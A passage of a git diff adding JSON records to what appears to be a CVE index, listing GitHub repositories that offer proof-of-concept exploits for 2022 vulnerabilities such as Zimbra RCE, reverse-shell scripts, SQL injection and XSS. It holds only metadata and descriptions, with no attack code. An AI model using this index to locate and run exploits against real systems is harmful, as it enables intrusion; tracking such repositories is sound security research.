"https:\/\/avatars.githubusercontent.com\/u\/117660722?v=4", + "html_url": "https:\/\/github.com\/cyber-defence-campus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyber-defence-campus\/netgear_r6700v3_circled", + "description": "Demonstrate some functionalities of Morion by generating an exploit for CVE-2022-27646 (stack buffer overflow on Netgear R6700v3 routers).", + "fork": false, + "created_at": "2023-06-01T05:10:56Z", + "updated_at": "2024-10-28T07:04:26Z", + "pushed_at": "2024-10-28T07:04:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "armv7", + "emulation", + "exploit-generation", + "gdb", + "morion", + "symbolic-execution", + "triton" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27665.json b/2022/CVE-2022-27665.json new file mode 100644 index 0000000000..78ba5c76a4 --- /dev/null +++ b/2022/CVE-2022-27665.json @@ -0,0 +1,33 @@ +[ + { + "id": 473221384, + "name": "CVE-2022-27665", + "full_name": "dievus\/CVE-2022-27665", + "owner": { + "login": "dievus", + "id": 25853389, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4", + "html_url": "https:\/\/github.com\/dievus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dievus\/CVE-2022-27665", + "description": "Reflected XSS via AngularJS Sandbox Escape Expressions in IPSwitch WS_FTP Server 8.6.0", + "fork": false, + "created_at": "2022-03-23T14:20:58Z", + "updated_at": "2023-04-03T13:19:27Z", + "pushed_at": "2023-04-03T13:18:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27666.json b/2022/CVE-2022-27666.json new file mode 100644 index 0000000000..0269cfb74a --- /dev/null +++ b/2022/CVE-2022-27666.json @@ -0,0 +1,64 @@ +[ + { + "id": 473383769, + "name": "CVE-2022-27666", + "full_name": "plummm\/CVE-2022-27666", + "owner": { + "login": "plummm", + "id": 15259042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15259042?v=4", + "html_url": "https:\/\/github.com\/plummm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plummm\/CVE-2022-27666", + "description": "Exploit for CVE-2022-27666", + "fork": false, + "created_at": "2022-03-23T22:54:28Z", + "updated_at": "2024-08-12T20:21:48Z", + "pushed_at": "2022-03-28T18:21:00Z", + "stargazers_count": 203, + "watchers_count": 203, + "has_discussions": false, + "forks_count": 39, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 39, + "watchers": 203, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 626171379, + "name": "cve-2022-27666-exploits", + "full_name": "Albocoder\/cve-2022-27666-exploits", + "owner": { + "login": "Albocoder", + "id": 11018611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11018611?v=4", + "html_url": "https:\/\/github.com\/Albocoder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Albocoder\/cve-2022-27666-exploits", + "description": "There are 2 exploitation methods that exploit CVE-2022-27666. For more info on how to use these code bases please check my blog.", + "fork": false, + "created_at": "2023-04-11T00:12:33Z", + "updated_at": "2024-02-15T20:16:05Z", + "pushed_at": "2023-04-11T00:27:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27772.json b/2022/CVE-2022-27772.json new file mode 100644 index 0000000000..5b2b486099 --- /dev/null +++ b/2022/CVE-2022-27772.json @@ -0,0 +1,33 @@ +[ + { + "id": 482936939, + "name": "grails3-cve-2022-27772", + "full_name": "puneetbehl\/grails3-cve-2022-27772", + "owner": { + "login": "puneetbehl", + "id": 2108607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2108607?v=4", + "html_url": "https:\/\/github.com\/puneetbehl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puneetbehl\/grails3-cve-2022-27772", + "description": null, + "fork": false, + "created_at": "2022-04-18T17:32:49Z", + "updated_at": "2022-04-18T17:33:39Z", + "pushed_at": "2022-04-18T17:39:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27925.json b/2022/CVE-2022-27925.json new file mode 100644 index 0000000000..b7aec8a9cc --- /dev/null +++ b/2022/CVE-2022-27925.json @@ -0,0 +1,391 @@ +[ + { + "id": 524189931, + "name": "CVE-2022-27925-PoC", + "full_name": "vnhacker1337\/CVE-2022-27925-PoC", + "owner": { + "login": "vnhacker1337", + "id": 20364580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20364580?v=4", + "html_url": "https:\/\/github.com\/vnhacker1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vnhacker1337\/CVE-2022-27925-PoC", + "description": "Zimbra RCE simple poc", + "fork": false, + "created_at": "2022-08-12T18:35:52Z", + "updated_at": "2024-08-12T20:26:08Z", + "pushed_at": "2022-08-13T18:54:58Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 63, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 524792587, + "name": "CVE-2022-27925", + "full_name": "mohamedbenchikh\/CVE-2022-27925", + "owner": { + "login": "mohamedbenchikh", + "id": 58364955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58364955?v=4", + "html_url": "https:\/\/github.com\/mohamedbenchikh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mohamedbenchikh\/CVE-2022-27925", + "description": "Zimbra Unauthenticated Remote Code Execution Exploit (CVE-2022-27925)", + "fork": false, + "created_at": "2022-08-14T22:22:55Z", + "updated_at": "2024-08-12T20:26:12Z", + "pushed_at": "2022-09-05T22:05:53Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-27925", + "exploit", + "zimbra", + "zimbra-exploit" + ], + "visibility": "public", + "forks": 19, + "watchers": 56, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 526466016, + "name": "CVE-2022-27925", + "full_name": "miko550\/CVE-2022-27925", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-19T04:46:08Z", + "updated_at": "2022-08-19T04:47:37Z", + "pushed_at": "2022-08-19T04:51:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 526901190, + "name": "CVE-2022-27925", + "full_name": "navokus\/CVE-2022-27925", + "owner": { + "login": "navokus", + "id": 2224563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2224563?v=4", + "html_url": "https:\/\/github.com\/navokus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/navokus\/CVE-2022-27925", + "description": null, + "fork": false, + "created_at": "2022-08-20T11:01:05Z", + "updated_at": "2022-08-20T11:01:58Z", + "pushed_at": "2022-08-20T11:01:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 526972804, + "name": "CVE-2022-27925", + "full_name": "Josexv1\/CVE-2022-27925", + "owner": { + "login": "Josexv1", + "id": 12077848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12077848?v=4", + "html_url": "https:\/\/github.com\/Josexv1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Josexv1\/CVE-2022-27925", + "description": "Zimbra CVE-2022-27925 PoC", + "fork": false, + "created_at": "2022-08-20T15:58:29Z", + "updated_at": "2024-11-06T11:11:13Z", + "pushed_at": "2022-08-27T20:30:21Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-27925", + "exploit", + "poc", + "zimbra" + ], + "visibility": "public", + "forks": 23, + "watchers": 42, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 529394141, + "name": "CVE-2022-27925-Revshell", + "full_name": "Chocapikk\/CVE-2022-27925-Revshell", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-27925-Revshell", + "description": "Python Script to exploit Zimbra Auth Bypass + RCE (CVE-2022-27925)", + "fork": false, + "created_at": "2022-08-26T20:19:48Z", + "updated_at": "2024-08-12T20:26:32Z", + "pushed_at": "2022-09-17T16:56:10Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 535575434, + "name": "CVE-2022-27925", + "full_name": "akincibor\/CVE-2022-27925", + "owner": { + "login": "akincibor", + "id": 99909324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99909324?v=4", + "html_url": "https:\/\/github.com\/akincibor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akincibor\/CVE-2022-27925", + "description": "CVE-2022-27925 nuclei template", + "fork": false, + "created_at": "2022-09-12T08:30:30Z", + "updated_at": "2022-09-16T16:47:12Z", + "pushed_at": "2022-09-12T08:31:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 537944043, + "name": "CVE-2022-27925-Revshell", + "full_name": "touchmycrazyredhat\/CVE-2022-27925-Revshell", + "owner": { + "login": "touchmycrazyredhat", + "id": 112880228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112880228?v=4", + "html_url": "https:\/\/github.com\/touchmycrazyredhat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/touchmycrazyredhat\/CVE-2022-27925-Revshell", + "description": null, + "fork": false, + "created_at": "2022-09-17T22:24:32Z", + "updated_at": "2024-08-12T20:27:07Z", + "pushed_at": "2022-09-17T23:14:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 541211049, + "name": "Zimbra", + "full_name": "jam620\/Zimbra", + "owner": { + "login": "jam620", + "id": 17382838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17382838?v=4", + "html_url": "https:\/\/github.com\/jam620", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jam620\/Zimbra", + "description": "CVE-2022-27925", + "fork": false, + "created_at": "2022-09-25T15:09:49Z", + "updated_at": "2024-09-25T02:18:08Z", + "pushed_at": "2022-09-25T15:10:50Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 543986246, + "name": "CVE-2022-27925", + "full_name": "Inplex-sys\/CVE-2022-27925", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-27925", + "description": "A loader for zimbra 2022 rce (cve-2022-27925)", + "fork": false, + "created_at": "2022-10-01T10:33:55Z", + "updated_at": "2024-06-26T09:43:07Z", + "pushed_at": "2024-02-20T23:39:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "education", + "poc", + "rce", + "zimbra-exploit", + "zimbra-rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554214326, + "name": "CVE-2022-27925-PoC", + "full_name": "onlyHerold22\/CVE-2022-27925-PoC", + "owner": { + "login": "onlyHerold22", + "id": 115049570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115049570?v=4", + "html_url": "https:\/\/github.com\/onlyHerold22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onlyHerold22\/CVE-2022-27925-PoC", + "description": null, + "fork": false, + "created_at": "2022-10-19T12:46:48Z", + "updated_at": "2022-10-19T12:47:05Z", + "pushed_at": "2022-10-19T12:47:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844643090, + "name": "CVE-2022-27925", + "full_name": "sanan2004\/CVE-2022-27925", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2022-27925", + "description": "PoC", + "fork": false, + "created_at": "2024-08-19T17:17:24Z", + "updated_at": "2024-08-21T09:20:35Z", + "pushed_at": "2024-08-19T17:17:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27927.json b/2022/CVE-2022-27927.json new file mode 100644 index 0000000000..ee31643b6a --- /dev/null +++ b/2022/CVE-2022-27927.json @@ -0,0 +1,33 @@ +[ + { + "id": 474575948, + "name": "Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "erengozaydin\/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-27927", + "fork": false, + "created_at": "2022-03-27T08:17:47Z", + "updated_at": "2022-04-19T14:13:18Z", + "pushed_at": "2022-03-28T07:30:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27997.json b/2022/CVE-2022-27997.json new file mode 100644 index 0000000000..a693d095e7 --- /dev/null +++ b/2022/CVE-2022-27997.json @@ -0,0 +1,33 @@ +[ + { + "id": 686590287, + "name": "CVE-2023-27997", + "full_name": "Cyb3rEnthusiast\/CVE-2023-27997", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2023-27997", + "description": "How to get access via CVE-2022-27997", + "fork": false, + "created_at": "2023-09-03T10:01:24Z", + "updated_at": "2023-09-10T10:48:40Z", + "pushed_at": "2023-09-09T09:22:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28077.json b/2022/CVE-2022-28077.json new file mode 100644 index 0000000000..929fb234d3 --- /dev/null +++ b/2022/CVE-2022-28077.json @@ -0,0 +1,33 @@ +[ + { + "id": 490983000, + "name": "CVE-2022-28077", + "full_name": "bigzooooz\/CVE-2022-28077", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-28077", + "description": "Home Owners Collection Management System 1.0 - Reflected XSS", + "fork": false, + "created_at": "2022-05-11T06:23:46Z", + "updated_at": "2024-08-12T20:23:10Z", + "pushed_at": "2022-05-11T06:25:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28078.json b/2022/CVE-2022-28078.json new file mode 100644 index 0000000000..d9c01a0e16 --- /dev/null +++ b/2022/CVE-2022-28078.json @@ -0,0 +1,33 @@ +[ + { + "id": 490984329, + "name": "CVE-2022-28078", + "full_name": "bigzooooz\/CVE-2022-28078", + "owner": { + "login": "bigzooooz", + "id": 7108710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7108710?v=4", + "html_url": "https:\/\/github.com\/bigzooooz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigzooooz\/CVE-2022-28078", + "description": "Home Owners Collection Management System 1.0 - Reflected XSS", + "fork": false, + "created_at": "2022-05-11T06:28:28Z", + "updated_at": "2024-08-12T20:23:10Z", + "pushed_at": "2022-05-11T06:29:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28079.json b/2022/CVE-2022-28079.json new file mode 100644 index 0000000000..aff9a2a5a8 --- /dev/null +++ b/2022/CVE-2022-28079.json @@ -0,0 +1,33 @@ +[ + { + "id": 475749198, + "name": "College-Management-System-course_code-SQL-Injection-Authenticated", + "full_name": "erengozaydin\/College-Management-System-course_code-SQL-Injection-Authenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/College-Management-System-course_code-SQL-Injection-Authenticated", + "description": "CVE-2022-28079", + "fork": false, + "created_at": "2022-03-30T06:32:38Z", + "updated_at": "2022-05-05T17:25:32Z", + "pushed_at": "2022-03-30T06:33:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28080.json b/2022/CVE-2022-28080.json new file mode 100644 index 0000000000..1aa49d82d2 --- /dev/null +++ b/2022/CVE-2022-28080.json @@ -0,0 +1,33 @@ +[ + { + "id": 475750736, + "name": "Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "full_name": "erengozaydin\/Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "description": "CVE-2022-28080", + "fork": false, + "created_at": "2022-03-30T06:37:48Z", + "updated_at": "2022-05-05T17:26:09Z", + "pushed_at": "2022-03-30T06:38:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28099.json b/2022/CVE-2022-28099.json new file mode 100644 index 0000000000..2481b9a11b --- /dev/null +++ b/2022/CVE-2022-28099.json @@ -0,0 +1,33 @@ +[ + { + "id": 487158568, + "name": "CVE-2022-28099", + "full_name": "IbrahimEkimIsik\/CVE-2022-28099", + "owner": { + "login": "IbrahimEkimIsik", + "id": 53093499, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53093499?v=4", + "html_url": "https:\/\/github.com\/IbrahimEkimIsik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IbrahimEkimIsik\/CVE-2022-28099", + "description": "SQL injection for Poultry Farm Management System 1.0", + "fork": false, + "created_at": "2022-04-30T02:01:09Z", + "updated_at": "2022-04-30T02:01:09Z", + "pushed_at": "2022-04-30T02:02:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28113.json b/2022/CVE-2022-28113.json new file mode 100644 index 0000000000..8482b44b64 --- /dev/null +++ b/2022/CVE-2022-28113.json @@ -0,0 +1,33 @@ +[ + { + "id": 474472339, + "name": "CVE-2022-28113", + "full_name": "code-byter\/CVE-2022-28113", + "owner": { + "login": "code-byter", + "id": 10854537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10854537?v=4", + "html_url": "https:\/\/github.com\/code-byter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/code-byter\/CVE-2022-28113", + "description": "Unauthenticated RCE exploit for Fantec MWiD25-DS", + "fork": false, + "created_at": "2022-03-26T21:39:00Z", + "updated_at": "2023-04-18T06:33:27Z", + "pushed_at": "2022-04-06T20:55:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28117.json b/2022/CVE-2022-28117.json new file mode 100644 index 0000000000..da9931e2c8 --- /dev/null +++ b/2022/CVE-2022-28117.json @@ -0,0 +1,64 @@ +[ + { + "id": 478572145, + "name": "CVE-2022-28117", + "full_name": "cheshireca7\/CVE-2022-28117", + "owner": { + "login": "cheshireca7", + "id": 34421496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34421496?v=4", + "html_url": "https:\/\/github.com\/cheshireca7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cheshireca7\/CVE-2022-28117", + "description": "Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)", + "fork": false, + "created_at": "2022-04-06T13:27:48Z", + "updated_at": "2024-08-12T20:22:11Z", + "pushed_at": "2022-07-06T11:16:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735816901, + "name": "POC-CVE-2022-28117", + "full_name": "kimstars\/POC-CVE-2022-28117", + "owner": { + "login": "kimstars", + "id": 23279002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23279002?v=4", + "html_url": "https:\/\/github.com\/kimstars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimstars\/POC-CVE-2022-28117", + "description": null, + "fork": false, + "created_at": "2023-12-26T06:51:54Z", + "updated_at": "2024-01-06T15:15:30Z", + "pushed_at": "2023-12-26T06:52:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28118.json b/2022/CVE-2022-28118.json new file mode 100644 index 0000000000..0b25e80b1d --- /dev/null +++ b/2022/CVE-2022-28118.json @@ -0,0 +1,33 @@ +[ + { + "id": 372129057, + "name": "SSCMS-PluginShell", + "full_name": "Richard-Tang\/SSCMS-PluginShell", + "owner": { + "login": "Richard-Tang", + "id": 30547741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30547741?v=4", + "html_url": "https:\/\/github.com\/Richard-Tang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Richard-Tang\/SSCMS-PluginShell", + "description": "CVE-2022-28118", + "fork": false, + "created_at": "2021-05-30T05:14:19Z", + "updated_at": "2024-08-12T20:13:27Z", + "pushed_at": "2022-03-27T11:36:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28132.json b/2022/CVE-2022-28132.json new file mode 100644 index 0000000000..de70a2eac8 --- /dev/null +++ b/2022/CVE-2022-28132.json @@ -0,0 +1,33 @@ +[ + { + "id": 501326508, + "name": "CVE-2022-28132", + "full_name": "alpernae\/CVE-2022-28132", + "owner": { + "login": "alpernae", + "id": 39368379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39368379?v=4", + "html_url": "https:\/\/github.com\/alpernae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alpernae\/CVE-2022-28132", + "description": null, + "fork": false, + "created_at": "2022-06-08T16:19:47Z", + "updated_at": "2022-06-08T16:27:20Z", + "pushed_at": "2023-03-19T23:04:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28171.json b/2022/CVE-2022-28171.json new file mode 100644 index 0000000000..4d6d4f2720 --- /dev/null +++ b/2022/CVE-2022-28171.json @@ -0,0 +1,64 @@ +[ + { + "id": 666967366, + "name": "CVE-2022-28171-POC", + "full_name": "NyaMeeEain\/CVE-2022-28171-POC", + "owner": { + "login": "NyaMeeEain", + "id": 28331671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28331671?v=4", + "html_url": "https:\/\/github.com\/NyaMeeEain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NyaMeeEain\/CVE-2022-28171-POC", + "description": null, + "fork": false, + "created_at": "2023-07-16T07:30:22Z", + "updated_at": "2024-10-13T23:14:31Z", + "pushed_at": "2023-08-09T05:14:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894493486, + "name": "hikvision_probe", + "full_name": "aengussong\/hikvision_probe", + "owner": { + "login": "aengussong", + "id": 26045876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26045876?v=4", + "html_url": "https:\/\/github.com\/aengussong", + "user_view_type": "public" + }, + "html_url": 